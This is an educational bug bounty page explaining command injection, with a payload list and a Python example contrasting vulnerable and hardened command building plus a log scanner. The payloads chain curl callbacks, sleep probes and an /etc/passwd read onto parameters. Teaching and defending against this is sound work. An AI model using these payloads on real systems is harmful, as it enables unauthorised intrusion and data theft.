Learning about Command Injection


Command Injection is one of the highest-paying bug classes on bug bounty programs, and for very good reason: it can sometimes give an attacker full control of the target system and let them run code directly on it. Command Injection is when the web application executes your input as part of an operating system command. Put simply, it takes your input and runs it as a command.

Imagine you have opened your CMD prompt and typed ping google.com - this is exactly what is happening here. Believe it or not, command injection is actually very easy to test for, as the parameters are right in front of you; it's just a simple case of testing! Any parameter can be vulnerable.

When testing for command injection, always make sure to respect a company's vulnerability disclosure policy on which commands they'd prefer you to try. Some companies don't want you browsing files you shouldn't or accidentally breaking their website, so make sure not only to read this policy carefully but to stick to the rules.

Finding Command Injections

Honestly, you can literally test every single parameter you find for command injection. Bug bounty programs are usually blackbox testing, meaning you have no idea what the code is doing behind the scenes as it isn't open source. So with that in mind, and with some common payloads to hand, where can you go wrong by testing each parameter? You start with no idea what the parameter is doing, but you can find out by testing it.

| curl https://www.yoursite.com/
|| curl https://www.yoursite.com/
& curl https://www.yoursite.com/
; curl https://www.yoursite.com/
&& curl https://www.yoursite.com/
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& phpinfo()
`ping yoursite.com`
%0a curl https://www.yoursite.com/ %0a
{{ get_user_file("/etc/passwd") }}
{${sleep(10)}}

Imagine you have the following request with a view parameter, https://www.example.com/help.php?view=faq, and you inject | curl https://www.yoursite.com/, so the URL becomes https://www.example.com/help.php?view=faq|%20curl%20https://www.yoursite.com/.

If you receive a request to your site, then you have command injection. Don't forget that you can try these payloads in header values as well!
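To show what is actually happening on the server side of the help.php?view=faq example, and why the separators in the payload list above work, here is an added example in Python (not code from the original page, which gives no server code; the real page would be PHP). It assumes a hypothetical handler that reads a help file named after the view parameter. It puts the vulnerable pattern (input concatenated into a shell command string) beside the hardened one (allow-list plus an argv list with no shell), and adds a defender-side scan of a constructed access log for the same metacharacters:

```python
import re
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# Characters a POSIX shell treats specially. This covers the separators in the
# payload list above: | || & ; && backticks $() ${} and %0a (a URL-encoded newline).
SHELL_META = re.compile(r'[|&;`$\n\r<>(){}]')


def contains_shell_metachars(value: str) -> bool:
    """True when a parameter value, after URL-decoding, carries shell syntax."""
    return SHELL_META.search(unquote(value)) is not None


def build_command_vulnerable(view: str) -> str:
    """The bug: input pasted into a string that is later handed to a shell
    (shell=True, os.system(), PHP's shell_exec(), ...). The string is returned,
    not executed, so the resulting command line can be inspected safely.
    With view = "faq| curl https://www.yoursite.com/" the shell sees a pipe and
    runs curl as a second command."""
    return "cat /var/www/help/" + view + ".txt"   # hypothetical help-file path


# Allow-list for the hardened version: short identifiers only.
SAFE_VIEW = re.compile(r'^[A-Za-z0-9_-]{1,32}$')


def build_command_hardened(view: str) -> Optional[List[str]]:
    """The fix: validate against an allow-list, then build an argv list for
    subprocess.run(argv) (no shell). The value is always a single argument and
    can never turn into a second command. Returns None when the value is rejected."""
    if not SAFE_VIEW.fullmatch(view):
        return None
    return ["cat", "/var/www/help/" + view + ".txt"]


def suspicious_requests(access_log: str) -> List[str]:
    """Defender-side check: return the request lines whose query-string values
    contain shell metacharacters. '&' is the legitimate parameter separator, so
    each value is examined on its own; an encoded %26 still shows up after decoding."""
    hits = []
    for line in access_log.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for part in query.split("&"):
            value = part.partition("=")[2]
            if contains_shell_metachars(value):
                hits.append(line)
                break
    return hits


# Constructed sample access log (combined log format, made up for this example).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /help.php?view=faq HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /help.php?view=faq|%20curl%20https://www.yoursite.com/ HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /help.php?view=faq%0a%20sleep%2015 HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /help.php?view=contact HTTP/1.1" 200 498
"""

if __name__ == "__main__":
    payload = "faq| curl https://www.yoursite.com/"
    print("vulnerable builds:", build_command_vulnerable(payload))
    print("hardened builds:  ", build_command_hardened(payload))
    print("hardened (faq):   ", build_command_hardened("faq"))
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("suspicious:", hit)
```

The argv-list form is the real fix; the allow-list is defence in depth that also gives you a clean place to log rejected values. The log scan only looks at decoded parameter values, so a raw, unencoded & or && in the query is indistinguishable from the normal parameter separator and is not flagged by this check.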

For a full payload list and more information, check out the useful payload list, as well as https://github.com/payloadbox/command-injection-payload-list

A really good write-up on how to use Burp to test for command injection can be found here: https://support.portswigger.net/customer/portal/articles/2590661-using-burp-to-test-for-os-command-injection-vulnerabilities, and a really good write-up on understanding command injection by Jobert from HackerOne can be found here: https://www.hackerone.com/blog/how-to-command-injections.


Test your knowledge with BugBountyHunter Challenges


We have free labs for this vulnerability coming soon. Currently it is only available on our members web application BARKER.

Resources

A list of useful websites, blog posts, reports and tools to help you.